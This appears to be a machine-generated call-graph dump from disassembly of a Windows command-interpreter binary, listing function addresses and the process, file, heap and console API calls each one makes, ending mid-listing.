17567->17569 17568->17510 17569->17568 17571 7ff789bd4a40 GetProcessHeap RtlAllocateHeap 17570->17571 17572 7ff789bd3f67 17570->17572 17574 7ff789bd4a9f FreeEnvironmentStringsW 17571->17574 17575 7ff789bd4a91 memmove 17571->17575 17572->17530 17572->17531 17574->17572 17575->17574 17577 7ff789bcb6d0 GetProcessHeap HeapReAlloc 17576->17577 17578 7ff789bdc34c 17576->17578 17577->17578 17579 7ff789bcb6ff GetProcessHeap HeapSize 17577->17579 17580 7ff789bc3278 166 API calls 17578->17580 17582 7ff789bcb726 17579->17582 17581 7ff789bdc356 17580->17581 17581->17237 17582->17237 17586 7ff789bdecd4 GetLastError 17585->17586 17587 7ff789bd42ab UpdateProcThreadAttribute 17585->17587 17588 7ff789bdecee 17586->17588 17589 7ff789bdecf0 GetLastError 17587->17589 17590 7ff789bd42eb memset memset GetStartupInfoW 17587->17590 17694 7ff789be9eec 17589->17694 17669 7ff789bd3a90 17590->17669 17595 7ff789bcb900 166 API calls 17596 7ff789bd43bb 17595->17596 17597 7ff789bd43cc 17596->17597 17598 7ff789bd4638 _local_unwind 17596->17598 17599 7ff789bd4415 17597->17599 17600 7ff789bd43de wcsrchr 17597->17600 17598->17597 17681 7ff789bd5a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 17599->17681 17600->17599 17601 7ff789bd43f7 lstrcmpW 17600->17601 17601->17599 17603 7ff789bd4668 17601->17603 17682 7ff789be9044 17603->17682 17604 7ff789bd441a 17606 7ff789bd442a CreateProcessW 17604->17606 17607 7ff789bd4596 CreateProcessAsUserW 17604->17607 17608 7ff789bd448b 17606->17608 17607->17608 17609 7ff789bd4495 CloseHandle 17608->17609 17610 7ff789bd4672 GetLastError 17608->17610 17611 7ff789bd498c 8 API calls 17609->17611 17621 7ff789bd468d 17610->17621 17612 7ff789bd44c5 17611->17612 17614 7ff789bd44cd 17612->17614 17612->17621 17613 7ff789bd47a3 17613->16982 17614->17613 17632 7ff789bea250 33 API calls 17614->17632 17636 7ff789bd44f8 17614->17636 17615 7ff789bccd90 166 API calls 17618 7ff789bd4724 17615->17618 17616 7ff789bd5cb4 7 API calls 17620 7ff789bd4517 17616->17620 17617 7ff789bd461c 17623 7ff789bcff70 GetProcessHeap RtlFreeHeap 17617->17623 17622 7ff789bd472c _local_unwind 17618->17622 17625 7ff789bd473d 17618->17625 17619 7ff789bd47e1 CloseHandle 17619->17617 17624 7ff789bd33f0 _vsnwprintf 17620->17624 17621->17614 17621->17615 17622->17625 17626 7ff789bd47fa DeleteProcThreadAttributeList 17623->17626 17627 7ff789bd4544 17624->17627 17633 7ff789bcff70 GetProcessHeap RtlFreeHeap 17625->17633 17628 7ff789bd8f80 7 API calls 17626->17628 17629 7ff789bd498c 8 API calls 17627->17629 17630 7ff789bd4820 17628->17630 17631 7ff789bd4558 17629->17631 17630->16982 17634 7ff789bd4564 17631->17634 17635 7ff789bd47ae 17631->17635 17632->17636 17637 7ff789bd475b _local_unwind 17633->17637 17638 7ff789bd498c 8 API calls 17634->17638 17639 7ff789bd33f0 _vsnwprintf 17635->17639 17636->17613 17636->17616 17641 7ff789bd4612 17636->17641 17637->17614 17640 7ff789bd4577 17638->17640 17639->17641 17640->17617 17642 7ff789bd457f 17640->17642 17641->17617 17641->17619 17643 7ff789bea920 210 API calls 17642->17643 17644 7ff789bd4584 17643->17644 17644->17617 17650 7ff789bc9737 17645->17650 17647 7ff789bc977d memset 17649 7ff789bcca40 17 API calls 17647->17649 17648 7ff789bccd90 166 API calls 17648->17650 17649->17650 17650->17647 17650->17648 17651 7ff789bdb76e 17650->17651 17652 7ff789bdb7b3 17650->17652 17653 7ff789bdb79a 17650->17653 17663 7ff789bc986d 17650->17663 17701 7ff789bcb364 17650->17701 17707 7ff789bd1fac memset 17650->17707 17734 7ff789bcce10 17650->17734 17784 7ff789bc96b4 17650->17784 17789 7ff789bd5920 17650->17789 17654 7ff789bc3278 166 API calls 17651->17654 17656 7ff789bd855c ??_V@YAXPEAX 17653->17656 17657 7ff789bdb787 17654->17657 17656->17652 17658 7ff789bdb795 17657->17658 17795 7ff789bee944 17657->17795 17803 7ff789be7694 17658->17803 17665 7ff789bc9880 ??_V@YAXPEAX 17663->17665 17666 7ff789bc988c 17663->17666 17665->17666 17667 7ff789bd8f80 7 API calls 17666->17667 17668 7ff789bc989d 17667->17668 17668->16982 17670 7ff789bd3aa4 17669->17670 17679 7ff789bd3b73 17669->17679 17670->17679 17696 7ff789bd09f4 17670->17696 17673 7ff789bcb900 166 API calls 17674 7ff789bd3ad0 17673->17674 17675 7ff789bd3ad8 wcsrchr 17674->17675 17678 7ff789bd3af4 17674->17678 17675->17678 17676 7ff789bd3b66 17677 7ff789bcff70 2 API calls 17676->17677 17677->17679 17678->17676 17680 7ff789bd3b2d _wcsnicmp 17678->17680 17679->17595 17680->17678 17683 7ff789bd3a90 170 API calls 17682->17683 17684 7ff789be9064 17683->17684 17685 7ff789be9083 17684->17685 17686 7ff789be906e 17684->17686 17689 7ff789bccd90 166 API calls 17685->17689 17687 7ff789bd498c 8 API calls 17686->17687 17688 7ff789be9081 17687->17688 17688->17599 17690 7ff789be909b 17689->17690 17690->17688 17691 7ff789bd498c 8 API calls 17690->17691 17692 7ff789be90ec 17691->17692 17693 7ff789bcff70 2 API calls 17692->17693 17693->17688 17695 7ff789bded0a DeleteProcThreadAttributeList 17694->17695 17695->17588 17697 7ff789bd0a0b iswspace 17696->17697 17698 7ff789bd0a3c 17696->17698 17699 7ff789bd0a21 wcschr 17697->17699 17700 7ff789bd0a50 17697->17700 17698->17673 17699->17698 17699->17700 17700->17697 17700->17698 17700->17699 17702 7ff789bcca40 17 API calls 17701->17702 17703 7ff789bcb396 17702->17703 17704 7ff789be6d1c 14 API calls 17703->17704 17705 7ff789bcb3ca 17703->17705 17706 7ff789bdc27c 17704->17706 17705->17650 17709 7ff789bd203b 17707->17709 17708 7ff789bd20b0 17712 7ff789bd211c 17708->17712 17820 7ff789bd3060 17708->17820 17709->17708 17710 7ff789bd2094 17709->17710 17713 7ff789bd20a6 17710->17713 17714 7ff789bc3278 166 API calls 17710->17714 17712->17713 17809 7ff789bd2e44 17712->17809 17716 7ff789bd8f80 7 API calls 17713->17716 17714->17713 17717 7ff789bd2325 17716->17717 17717->17650 17718 7ff789bd2148 17718->17713 17814 7ff789bd2d70 17718->17814 17721 7ff789bcb900 166 API calls 17723 7ff789bd21d0 17721->17723 17722 7ff789bde04a ??_V@YAXPEAX 17722->17713 17723->17722 17724 7ff789bd221c wcsspn 17723->17724 17733 7ff789bd22a4 ??_V@YAXPEAX 17723->17733 17726 7ff789bcb900 166 API calls 17724->17726 17727 7ff789bd223b 17726->17727 17727->17722 17731 7ff789bd2252 17727->17731 17728 7ff789bd228f 17729 7ff789bcd3f0 223 API calls 17728->17729 17729->17733 17730 7ff789bde06d wcschr 17730->17731 17731->17728 17731->17730 17732 7ff789bde090 towupper 17731->17732 17732->17728 17732->17731 17733->17713 17772 7ff789bcd0f8 17734->17772 17783 7ff789bcce5b 17734->17783 17735 7ff789bd8f80 7 API calls 17737 7ff789bcd10a 17735->17737 17736 7ff789bdc860 17738 7ff789bdc97c 17736->17738 17883 7ff789beee88 17736->17883 17737->17650 18001 7ff789bee9b4 17738->18001 17744 7ff789bdc99a 17747 7ff789bdc9b3 ??_V@YAXPEAX 17744->17747 17744->17772 17745 7ff789bdc882 EnterCriticalSection LeaveCriticalSection 17750 7ff789bcd0e3 17745->17750 17746 7ff789bdc95c 17746->17738 17751 7ff789bc96b4 186 API calls 17746->17751 17747->17772 17749 7ff789bcceaa _tell 17752 7ff789bcd208 _close 17749->17752 17750->17650 17751->17746 17752->17783 17753 7ff789bccd90 166 API calls 17753->17783 17754 7ff789bdc9d5 18013 7ff789bed610 17754->18013 17756 7ff789bcb900 166 API calls 17756->17783 17758 7ff789bdca07 17759 7ff789bee91c 198 API calls 17758->17759 17764 7ff789bdca0c 17759->17764 17760 7ff789bebfec 176 API calls 17761 7ff789bdc9f1 17760->17761 17763 7ff789bc3240 166 API calls 17761->17763 17762 7ff789bccf33 memset 17762->17783 17763->17758 17764->17650 17765 7ff789bcca40 17 API calls 17765->17783 17766 7ff789bcd184 wcschr 17766->17783 17768 7ff789bdc9c9 17770 7ff789bd855c ??_V@YAXPEAX 17768->17770 17769 7ff789bcd1a7 wcschr 17769->17783 17770->17772 17772->17735 17773 7ff789bd0a6c 273 API calls 17773->17783 17774 7ff789bcbe00 635 API calls 17774->17783 17776 7ff789bccfab _wcsicmp 17776->17783 17778 7ff789bcd003 GetConsoleOutputCP GetCPInfo 17779 7ff789bd04f4 3 API calls 17778->17779 17779->17783 17781 7ff789bd1fac 238 API calls 17781->17783 17782 7ff789bcd044 ??_V@YAXPEAX 17782->17783 17783->17736 17783->17744 17783->17750 17783->17753 17783->17754 17783->17756 17783->17762 17783->17765 17783->17766 17783->17768 17783->17769 17783->17772 17783->17773 17783->17774 17783->17776 17783->17781 17783->17782 17841 7ff789bd0494 17783->17841 17854 7ff789bcdf60 17783->17854 17874 7ff789bd0580 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 17783->17874 17919 7ff789bebfec 17783->17919 17955 7ff789be778c 17783->17955 17986 7ff789bd3448 17783->17986 17991 7ff789bec738 17783->17991 17785 7ff789bdb6e2 RevertToSelf CloseHandle 17784->17785 17786 7ff789bc96c8 17784->17786 17787 7ff789bc96ce 17786->17787 17788 7ff789bc6a48 184 API calls 17786->17788 17787->17650 17788->17786 17790 7ff789bd5a12 17789->17790 17791 7ff789bd596c 17789->17791 17790->17650 17791->17790 17792 7ff789bd598d VirtualQuery 17791->17792 17792->17790 17794 7ff789bd59ad 17792->17794 17793 7ff789bd59b7 VirtualQuery 17793->17790 17793->17794 17794->17790 17794->17793 17796 7ff789bee954 17795->17796 17797 7ff789bee990 17795->17797 17799 7ff789beee88 390 API calls 17796->17799 17798 7ff789bee9b4 197 API calls 17797->17798 17800 7ff789bee995 longjmp 17798->17800 17801 7ff789bee964 17799->17801 17801->17797 17802 7ff789bc96b4 186 API calls 17801->17802 17802->17801 17804 7ff789be76a3 17803->17804 17805 7ff789be76b7 17804->17805 17807 7ff789bc96b4 186 API calls 17804->17807 17806 7ff789bee9b4 197 API calls 17805->17806 17808 7ff789be76bc longjmp 17806->17808 17807->17804 17810 7ff789bd9324 malloc 17809->17810 17811 7ff789bd2e7b 17810->17811 17812 7ff789bd2e83 memset 17811->17812 17813 7ff789bd2e90 17811->17813 17812->17813 17813->17718 17815 7ff789bd2da3 17814->17815 17816 7ff789bd2d89 17814->17816 17815->17816 17817 7ff789bd2dbc GetProcessHeap RtlFreeHeap 17815->17817 17819 7ff789bd21af 17816->17819 17830 7ff789bd2e0c 17816->17830 17817->17815 17817->17816 17819->17721 17834 7ff789bd1ea0 17820->17834 17822 7ff789bd3084 17823 7ff789bde4fc 17822->17823 17825 7ff789bd30b1 17822->17825 17824 7ff789bd417c 166 API calls 17823->17824 17829 7ff789bd311a 17824->17829 17826 7ff789bd30c8 SetErrorMode SetErrorMode GetFullPathNameW SetErrorMode 17825->17826 17827 7ff789bde557 17825->17827 17826->17829 17828 7ff789bd417c 166 API calls 17827->17828 17828->17829 17829->17712 17829->17829 17831 7ff789bd2e11 17830->17831 17832 7ff789bd2e32 17830->17832 17831->17832 17833 7ff789bde494 VirtualFree 17831->17833 17832->17816 17835 7ff789bd1ec4 17834->17835 17836 7ff789bd1eae wcschr 17834->17836 17835->17822 17836->17835 17838 7ff789bd1ece 17836->17838 17837 7ff789bd1f3f 17837->17822 17838->17837 17839 7ff789bd9158 7 API calls 17838->17839 17840 7ff789bd1f53 17839->17840 17843 7ff789bd04a4 17841->17843 17844 7ff789bd04b9 _get_osfhandle SetFilePointer 17843->17844 17845 7ff789bdd845 17843->17845 17847 7ff789bdd839 17843->17847 17849 7ff789bc3278 166 API calls 17843->17849 18022 7ff789bd26e0 17843->18022 17844->17783 18047 7ff789bef1d8 17845->18047 17848 7ff789bc3278 166 API calls 17847->17848 17850 7ff789bdd837 17848->17850 17851 7ff789bdd819 _getch 17849->17851 17851->17843 17852 7ff789bdd832 17851->17852 18046 7ff789bebde4 EnterCriticalSection LeaveCriticalSection 17852->18046 17855 7ff789bcdf93 17854->17855 17856 7ff789bcdfe2 17854->17856 17855->17856 17857 7ff789bcdf9f GetProcessHeap RtlFreeHeap 17855->17857 17858 7ff789bce100 VirtualFree 17856->17858 17859 7ff789bce00b _setjmp 17856->17859 17857->17855 17857->17856 17858->17856 17860 7ff789bce0c3 17859->17860 17861 7ff789bce04a 17859->17861 17860->17749 18056 7ff789bce600 17861->18056 17863 7ff789bce073 17864 7ff789bce0e0 longjmp 17863->17864 17865 7ff789bce081 17863->17865 17866 7ff789bce0b0 17864->17866 18065 7ff789bcd250 17865->18065 17866->17860 18096 7ff789bed3fc 17866->18096 17871 7ff789bce600 473 API calls 17872 7ff789bce0a7 17871->17872 17872->17866 17873 7ff789bed610 167 API calls 17872->17873 17873->17866 17875 7ff789bd05d5 17874->17875 17876 7ff789bd05ed _get_osfhandle GetConsoleMode 17874->17876 17875->17876 17877 7ff789bd0677 _get_osfhandle SetConsoleMode 17875->17877 17878 7ff789bd0615 17876->17878 17879 7ff789bd0653 17876->17879 17877->17876 17881 7ff789bd06ad 17877->17881 17878->17879 17880 7ff789bd0624 _get_osfhandle SetConsoleMode 17878->17880 17879->17778 17880->17879 17881->17876 17882 7ff789bdd87c _get_osfhandle SetConsoleMode 17881->17882 17882->17876 17884 7ff789beeed1 17883->17884 17885 7ff789beeefd 17883->17885 18478 7ff789bc7420 17884->18478 18492 7ff789bd885c FormatMessageW 17885->18492 17888 7ff789beef04 17894 7ff789beef41 LocalFree GetStdHandle GetConsoleMode 17888->17894 17898 7ff789beef2f _wcsupr 17888->17898 17890 7ff789bd01b8 6 API calls 17891 7ff789beeee5 17890->17891 17892 7ff789beeeeb 17891->17892 17893 7ff789beeef8 17891->17893 17895 7ff789bcd208 _close 17892->17895 17896 7ff789bcd208 _close 17893->17896 17899 7ff789beefcf SetConsoleMode 17894->17899 17900 7ff789beefe8 GetStdHandle GetConsoleMode 17894->17900 17916 7ff789beeef0 17895->17916 17896->17885 17898->17894 17899->17900 17902 7ff789bef015 SetConsoleMode 17900->17902 17917 7ff789bef03c 17900->17917 17901 7ff789bd8f80 7 API calls 17903 7ff789bdc879 17901->17903 17902->17917 17903->17745 17903->17746 17904 7ff789bc3240 166 API calls 17904->17917 17905 7ff789bd01b8 6 API calls 17905->17917 17906 7ff789bef07e GetStdHandle FlushConsoleInputBuffer 17906->17917 17907 7ff789bef0a0 GetStdHandle 17909 7ff789be8450 367 API calls 17907->17909 17908 7ff789bef12d wcschr 17908->17917 17909->17917 17910 7ff789bef161 17912 7ff789bef166 SetConsoleMode 17910->17912 17913 7ff789bef17a 17910->17913 17911 7ff789bd3448 166 API calls 17911->17908 17912->17913 17914 7ff789bef17f SetConsoleMode 17913->17914 17913->17916 17914->17916 17915 7ff789bef0d7 towupper 17915->17917 17916->17901 17917->17904 17917->17905 17917->17906 17917->17907 17917->17908 17917->17910 17917->17911 17917->17915 17918 7ff789bd3448 166 API calls 17917->17918 17918->17917 17920 7ff789bec036 17919->17920 17921 7ff789bec047 17919->17921 17922 7ff789bc3240 166 API calls 17920->17922 17923 7ff789bec6db 17921->17923 17926 7ff789bec067 17921->17926 17929 7ff789bd3448 166 API calls 17921->17929 17924 7ff789bec042 17922->17924 17925 7ff789bd8f80 7 API calls 17923->17925 18493 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 17924->18493 17928 7ff789bec6eb 17925->17928 17930 7ff789bd081c 166 API calls 17926->17930 17932 7ff789bec070 17926->17932 17928->17783 17929->17926 17930->17932 17931 7ff789bd417c 166 API calls 17933 7ff789bec0d1 17931->17933 17932->17931 18494 7ff789bebf84 17933->18494 17936 7ff789bec673 17937 7ff789bd33f0 _vsnwprintf 17936->17937 17938 7ff789bec696 17937->17938 17940 7ff789bd34a0 166 API calls 17938->17940 17939 7ff789bec1c5 towupper 17949 7ff789bec11a 17939->17949 17941 7ff789bec6ce 17940->17941 17941->17923 18568 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 17941->18568 17947 7ff789bec2db GetDriveTypeW 17947->17949 17948 7ff789bd33f0 _vsnwprintf 17951 7ff789bec5c8 LocalFree 17948->17951 17949->17938 17949->17939 17949->17947 17949->17948 17950 7ff789bd33f0 _vsnwprintf 17949->17950 17952 7ff789bec3ab 17949->17952 18502 7ff789bc586c GetVersion 17949->18502 18507 7ff789bd885c FormatMessageW 17949->18507 18508 7ff789bc6ee4 17949->18508 18542 7ff789bd3140 17949->18542 17950->17949 17951->17949 18498 7ff789bd33f0 17952->18498 17976 7ff789be77bc 17955->17976 17956 7ff789be7aca 17959 7ff789bd34a0 166 API calls 17956->17959 17957 7ff789be79c0 17963 7ff789bd34a0 166 API calls 17957->17963 17961 7ff789be7adb 17959->17961 17960 7ff789be7ab5 17964 7ff789bd3448 166 API calls 17960->17964 17966 7ff789be7af0 17961->17966 17970 7ff789bd3448 166 API calls 17961->17970 17962 7ff789be7984 17962->17957 17967 7ff789be7989 17962->17967 17969 7ff789be79d6 17963->17969 17978 7ff789be79ef 17964->17978 17965 7ff789be7a00 17974 7ff789be7a0b 17965->17974 17965->17978 17984 7ff789be7a33 17965->17984 17971 7ff789be778c 166 API calls 17966->17971 17967->17978 18586 7ff789be76e0 17967->18586 17968 7ff789bd3448 166 API calls 17968->17976 17972 7ff789bd3448 166 API calls 17969->17972 17985 7ff789be79e7 17969->17985 17970->17966 17975 7ff789be7afb 17971->17975 17972->17985 17974->17978 17979 7ff789bd34a0 166 API calls 17974->17979 17975->17967 17980 7ff789bd3448 166 API calls 17975->17980 17976->17956 17976->17957 17976->17960 17976->17962 17976->17965 17976->17967 17976->17968 17976->17978 17982 7ff789be778c 166 API calls 17976->17982 17977 7ff789bd3448 166 API calls 17977->17978 17978->17783 17981 7ff789be7a23 17979->17981 17980->17967 17983 7ff789be778c 166 API calls 17981->17983 17982->17976 17983->17985 17984->17977 18582 7ff789be7730 17985->18582 17987 7ff789bd363c _vsnwprintf 17986->17987 17988 7ff789bd347b 17987->17988 17989 7ff789bd34a0 166 API calls 17988->17989 17990 7ff789bd3491 17989->17990 17990->17783 17992 7ff789bec775 17991->17992 17999 7ff789bec7ab 17991->17999 17993 7ff789bccd90 166 API calls 17992->17993 17995 7ff789bec781 17993->17995 17994 7ff789bec8d4 17994->17783 17995->17994 17996 7ff789bcb0d8 194 API calls 17995->17996 17996->17994 17997 7ff789bcb6b0 170 API calls 17997->17999 17998 7ff789bcb038 _dup2 17998->17999 17999->17994 17999->17995 17999->17997 17999->17998 18000 7ff789bcd208 _close 17999->18000 18000->17999 18003 7ff789beea0f 18001->18003 18004 7ff789bee9d9 18001->18004 18002 7ff789beea67 18606 7ff789bec978 18002->18606 18003->18002 18005 7ff789bcaf98 2 API calls 18003->18005 18593 7ff789bc6a48 18004->18593 18005->18003 18008 7ff789beea6c 18009 7ff789beeaae 18008->18009 18012 7ff789bcd208 _close 18008->18012 18010 7ff789beeacf 18009->18010 18616 7ff789bd3a0c 18009->18616 18012->18008 18014 7ff789bed63d 18013->18014 18020 7ff789bed635 18013->18020 18015 7ff789bed64a 18014->18015 18016 7ff789bed658 18014->18016 18017 7ff789bc3278 166 API calls 18015->18017 18016->18020 18021 7ff789bc3278 166 API calls 18016->18021 18017->18020 18018 7ff789bed672 longjmp 18019 7ff789bdc9da 18018->18019 18019->17758 18019->17760 18020->18018 18020->18019 18021->18020 18023 7ff789bd2724 18022->18023 18024 7ff789bd272d 18022->18024 18023->18024 18025 7ff789bd27ef _wcsicmp 18023->18025 18026 7ff789bd274b 18023->18026 18024->17843 18025->18026 18027 7ff789bd2817 CreateFileW 18026->18027 18028 7ff789bd2779 CreateFileW 18026->18028 18027->18028 18030 7ff789bd2796 _open_osfhandle 18027->18030 18028->18030 18031 7ff789bde2f0 GetLastError 18028->18031 18032 7ff789bd2863 18030->18032 18033 7ff789bd27b6 18030->18033 18031->18024 18051 7ff789bd01b8 _get_osfhandle GetFileType 18032->18051 18033->17843 18036 7ff789bd2872 GetFileSize 18036->18033 18037 7ff789bd2895 SetFilePointer 18036->18037 18038 7ff789bd28d2 ReadFile 18037->18038 18039 7ff789bde31a GetLastError 18037->18039 18040 7ff789bde362 SetFilePointer 18038->18040 18041 7ff789bd2901 18038->18041 18039->18038 18042 7ff789bde334 18039->18042 18045 7ff789bde38e SetFilePointer 18040->18045 18041->18033 18041->18045 18043 7ff789bde34d CloseHandle 18042->18043 18044 7ff789bde339 _close 18042->18044 18043->18024 18044->18024 18045->18033 18049 7ff789bef1e8 18047->18049 18048 7ff789bef220 18048->17850 18049->18048 18050 7ff789bc3278 166 API calls 18049->18050 18050->18048 18054 7ff789bd0200 18051->18054 18055 7ff789bd01eb 18051->18055 18052 7ff789bd0212 GetStdHandle 18053 7ff789bd0221 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 18052->18053 18053->18055 18054->18052 18054->18053 18054->18055 18055->18033 18055->18036 18057 7ff789bce60f 18056->18057 18114 7ff789bcef40 18057->18114 18059 7ff789bce626 18060 7ff789bdccca longjmp 18059->18060 18061 7ff789bce637 18059->18061 18060->18061 18061->18061 18062 7ff789bd3448 166 API calls 18061->18062 18063 7ff789bce65f 18061->18063 18064 7ff789bdccfe 18062->18064 18063->17863 18064->17863 18066 7ff789bcd267 18065->18066 18071 7ff789bcd2d3 18065->18071 18067 7ff789bcd284 _wcsicmp 18066->18067 18072 7ff789bcd2a6 18066->18072 18068 7ff789bcd32b 18067->18068 18067->18072 18070 7ff789bce600 473 API calls 18068->18070 18068->18072 18069 7ff789bce600 473 API calls 18069->18071 18070->18068 18071->18066 18071->18069 18073 7ff789bcd305 18071->18073 18074 7ff789bcd316 18072->18074 18075 7ff789bcef40 472 API calls 18072->18075 18073->18074 18076 7ff789bce600 473 API calls 18073->18076 18074->17866 18074->17871 18082 7ff789bcedf8 18075->18082 18076->18066 18077 7ff789bdd0a2 longjmp 18078 7ff789bdd0c5 18077->18078 18079 7ff789bd3448 166 API calls 18078->18079 18080 7ff789bdd0d4 18079->18080 18081 7ff789bceece 18081->18074 18085 7ff789bccd90 166 API calls 18081->18085 18082->18077 18082->18078 18083 7ff789bcee68 18082->18083 18090 7ff789bceeb1 18082->18090 18084 7ff789bcef40 472 API calls 18083->18084 18084->18074 18086 7ff789bceee7 18085->18086 18088 7ff789bceeef 18086->18088 18089 7ff789bcef31 18086->18089 18087 7ff789bce600 473 API calls 18087->18090 18091 7ff789bce600 473 API calls 18088->18091 18092 7ff789bee91c 198 API calls 18089->18092 18090->18081 18090->18087 18093 7ff789bceec2 18090->18093 18091->18074 18094 7ff789bcef36 18092->18094 18095 7ff789bcef40 472 API calls 18093->18095 18094->18077 18095->18081 18109 7ff789bed419 18096->18109 18097 7ff789bdcadf 18098 7ff789bed576 18099 7ff789bed592 18098->18099 18110 7ff789bed555 18098->18110 18100 7ff789bd3448 166 API calls 18099->18100 18104 7ff789bed5a5 18100->18104 18101 7ff789bed5c4 18102 7ff789bd3448 166 API calls 18101->18102 18102->18097 18107 7ff789bed5ba 18104->18107 18111 7ff789bd3448 166 API calls 18104->18111 18105 7ff789bed541 18105->18099 18106 7ff789bed546 18105->18106 18106->18101 18106->18110 18448 7ff789bed36c 18107->18448 18108 7ff789bd3448 166 API calls 18108->18109 18109->18097 18109->18098 18109->18099 18109->18101 18109->18105 18109->18108 18109->18110 18113 7ff789bed3fc 166 API calls 18109->18113 18455 7ff789bed31c 18110->18455 18111->18107 18113->18109 18115 7ff789bcef71 18114->18115 18116 7ff789bdd1f3 18115->18116 18117 7ff789bcf130 18115->18117 18126 7ff789bcef87 18115->18126 18116->18059 18118 7ff789bd3448 166 API calls 18117->18118 18122 7ff789bcf046 18117->18122 18118->18122 18119 7ff789bcf433 18146 7ff789bcf8c0 EnterCriticalSection LeaveCriticalSection 18119->18146 18121 7ff789bcf438 18121->18122 18199 7ff789bcf860 18121->18199 18122->18059 18127 7ff789bcf0c4 iswdigit 18122->18127 18128 7ff789bcf1fc iswdigit 18122->18128 18129 7ff789bcf1b7 iswspace 18122->18129 18131 7ff789bcf558 iswspace 18122->18131 18133 7ff789bcf860 456 API calls 18122->18133 18134 7ff789bcf8c0 456 API calls 18122->18134 18135 7ff789bdd1df 18122->18135 18136 7ff789bcf860 456 API calls 18122->18136 18141 7ff789bcf32f iswspace 18122->18141 18142 7ff789bcf2b8 iswdigit 18122->18142 18144 7ff789bcf3d2 iswspace 18122->18144 18123 7ff789bceff2 iswspace 18125 7ff789bcf01f wcschr 18123->18125 18123->18126 18125->18122 18126->18116 18126->18119 18126->18121 18126->18122 18126->18123 18126->18125 18127->18122 18128->18122 18129->18127 18130 7ff789bcf1ce wcschr 18129->18130 18130->18127 18130->18128 18131->18122 18132 7ff789bcf6cd wcschr 18131->18132 18132->18122 18133->18122 18134->18122 18137 7ff789bc3278 166 API calls 18135->18137 18138 7ff789bcf632 iswspace 18136->18138 18137->18116 18138->18122 18139 7ff789bcf648 wcschr 18138->18139 18139->18122 18140 7ff789bcf65f iswdigit 18139->18140 18140->18122 18141->18122 18143 7ff789bcf342 wcschr 18141->18143 18142->18122 18143->18122 18143->18142 18144->18122 18145 7ff789bcf3e9 wcschr 18144->18145 18145->18122 18170 7ff789bcf934 18146->18170 18147 7ff789bcf94a EnterCriticalSection LeaveCriticalSection 18151 7ff789bcf994 _get_osfhandle 18147->18151 18147->18170 18148 7ff789bcfb46 18213 7ff789bcfc30 GetProcessHeap HeapAlloc 18148->18213 18149 7ff789bc3240 166 API calls 18149->18170 18150 7ff789bebfec 176 API calls 18150->18170 18204 7ff789bd0010 SetFilePointer 18151->18204 18155 7ff789bcfb52 18155->18121 18156 7ff789bdd3fa EnterCriticalSection LeaveCriticalSection longjmp 18156->18170 18157 7ff789bcfbe6 GetLastError 18175 7ff789bcfa42 18157->18175 18158 7ff789bdd388 _get_osfhandle 18160 7ff789bd0010 9 API calls 18158->18160 18159 7ff789bd01b8 6 API calls 18159->18170 18160->18170 18161 7ff789bdd3b6 GetLastError 18161->18170 18161->18175 18162 7ff789bee9b4 197 API calls 18163 7ff789bdd474 longjmp 18162->18163 18163->18170 18164 7ff789bdd2ac 18249 7ff789bebf2c _get_osfhandle 18164->18249 18165 7ff789bdd2c7 EnterCriticalSection LeaveCriticalSection _get_osfhandle 18254 7ff789be7f00 GetStdHandle 18165->18254 18168 7ff789bcfa80 wcschr 18168->18170 18169 7ff789bdd32e GetLastError 18169->18170 18170->18147 18170->18148 18170->18149 18170->18150 18170->18151 18170->18156 18170->18157 18170->18158 18170->18159 18170->18161 18170->18162 18170->18164 18170->18165 18170->18168 18170->18169 18171 7ff789bd3448 166 API calls 18170->18171 18172 7ff789bd3448 166 API calls 18170->18172 18174 7ff789bcfbd4 18170->18174 18170->18175 18176 7ff789bcfaf0 18170->18176 18248 7ff789bef318 _get_osfhandle GetFileType 18170->18248 18173 7ff789bdd34d longjmp 18171->18173 18172->18170 18173->18170 18174->18148 18182 7ff789bcfbe1 18174->18182 18175->18121 18177 7ff789bd01b8 6 API calls 18176->18177 18178 7ff789bcfb0a 18177->18178 18178->18148 18181 7ff789bcfb0e _get_osfhandle SetFilePointer 18178->18181 18179 7ff789bdd4ee 18180 7ff789bc3278 166 API calls 18179->18180 18185 7ff789bdd4fb 18180->18185 18181->18148 18186 7ff789bdd533 18181->18186 18182->18179 18183 7ff789bdd4dd 18182->18183 18187 7ff789bebfec 176 API calls 18182->18187 18184 7ff789bc3278 166 API calls 18183->18184 18189 7ff789bdd4e9 18184->18189 18190 7ff789bdd514 longjmp 18185->18190 18193 7ff789bd01b8 6 API calls 18185->18193 18186->18148 18293 7ff789bd34a0 18186->18293 18188 7ff789bdd4c9 18187->18188 18191 7ff789bd3448 166 API calls 18188->18191 18192 7ff789bee91c 198 API calls 18189->18192 18190->18175 18194 7ff789bdd4d1 18191->18194 18192->18179 18196 7ff789bdd50b 18193->18196 18197 7ff789bd3448 166 API calls 18194->18197 18196->18190 18285 7ff789bef4a8 18196->18285 18197->18183 18200 7ff789bcf871 18199->18200 18201 7ff789bcf8c0 456 API calls 18200->18201 18202 7ff789bcf881 18200->18202 18203 7ff789bdd203 18201->18203 18202->18122 18205 7ff789bd0062 AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18204->18205 18206 7ff789bd005d 18204->18206 18207 7ff789bd0190 18205->18207 18208 7ff789bd00bb 18205->18208 18206->18205 18207->18170 18208->18207 18209 7ff789bd0167 MultiByteToWideChar 18208->18209 18210 7ff789bdd6db AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18208->18210 18211 7ff789bd0131 SetFilePointer 18208->18211 18209->18207 18210->18207 18211->18208 18214 7ff789bdd55c 18213->18214 18215 7ff789bcfc6a 18213->18215 18216 7ff789bc3278 166 API calls 18214->18216 18217 7ff789bdd571 memset longjmp 18215->18217 18230 7ff789bcfca2 18215->18230 18218 7ff789bdd566 18216->18218 18219 7ff789bcfce7 18217->18219 18218->18217 18219->18155 18220 7ff789bcfd73 18221 7ff789bdd638 18220->18221 18222 7ff789bcfd99 18220->18222 18223 7ff789bc3278 166 API calls 18221->18223 18224 7ff789bcff70 2 API calls 18222->18224 18225 7ff789bdd64c 18223->18225 18226 7ff789bcfda1 18224->18226 18227 7ff789bcff70 2 API calls 18225->18227 18226->18155 18228 7ff789bdd654 longjmp 18227->18228 18232 7ff789bcff4f 18228->18232 18230->18219 18230->18220 18230->18232 18233 7ff789bdd609 18230->18233 18238 7ff789bdd5b5 memmove 